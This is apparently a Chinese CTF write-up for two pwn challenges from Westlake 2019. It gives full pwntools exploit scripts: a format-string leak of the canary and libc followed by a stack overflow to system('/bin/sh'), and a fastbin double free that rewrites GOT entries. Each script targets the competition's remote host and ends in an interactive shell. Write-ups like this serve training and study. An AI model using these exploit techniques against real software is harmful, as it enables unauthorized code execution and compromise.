Westlake_2019

西湖论剑 2019

start

感觉省外竞争好激烈…省内混进决赛感觉很惭愧… 最后题pwn没做出来..还是自己太菜了#单独和0ctf的storm一起写篇 前两题pwn比较简单.

story

binary 第一个是fmtstr的漏洞第二个是溢出漏洞. 合起来简单用法就是fmtstr泄露canary和libc 溢出跳one_gadge或者system

exp

from pwn import *
context.log_level='debug'
#p=process("./story")
p=remote("ctf2.linkedbyx.com",10525)
#gdb.attach(p,'b printf')
p.sendlineafter("ID:","%23$p|%25$p")
p.readuntil("ello ")
canary=int(p.readuntil("|")[:-1],16)
base=int(p.readline()[:-1],16)-(0x7ffff7a2d830-0x7ffff7a0d000)
log.warning(hex(canary))
log.warning(hex(base))
p.sendlineafter("story:\n",str(1024))
one=0x3ac5c
libc=ELF("./story").libc
libc.address=base
p.sendlineafter("story:\n","A"*0x88+p64(canary)*2+p64(0x0000000000400bd3)+p64(libc.search("/bin/sh").next())+p64(libc.symbols['system']))
p.interactive()

noinfoleak

binary 好像就是没有show但是double_free double_free控制到bss上的list对free的got改写为puts的plt 之后泄露地址,然后改写atoi的got为system

exp

from pwn import *
def cmd(c):
	p.sendlineafter(">",str(c))
def add(size,c):
	cmd(1)
	cmd(size)
	p.sendlineafter(">",c)
def free(idx):
	cmd(2)
	cmd(idx)
def edit(idx,c):
	cmd(3)
	cmd(idx)
	p.sendafter(">",c)
#p=process("./noinfoleak")
p=remote("ctf2.linkedbyx.com",10856)
got=0x000000000601018
puts=0x4006b0
context.log_level='debug'
add(0x67,"A")#0
add(0x67,"A")#1
free(0)
free(1)
free(0)
add(0x67,p64(0x60108d))
add(0x67,"A")
add(0x67,"A")
add(0x67,"\x00"*3+p64(got)+p64(0x20)+p64(0x000000000601020)+p64(0x20)+p64(0x000000000601068)+'\xaa')
edit(0,p64(0x4006b0)[:-1])
free(1)
base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7a7e290-0x7ffff7a0d000)
libc=ELF("./noinfoleak").libc
libc.address=base
log.info(hex(base))
edit(2,p64(libc.symbols['system']))
cmd("/bin/sh")
#gdb.attach(p)


p.interactive()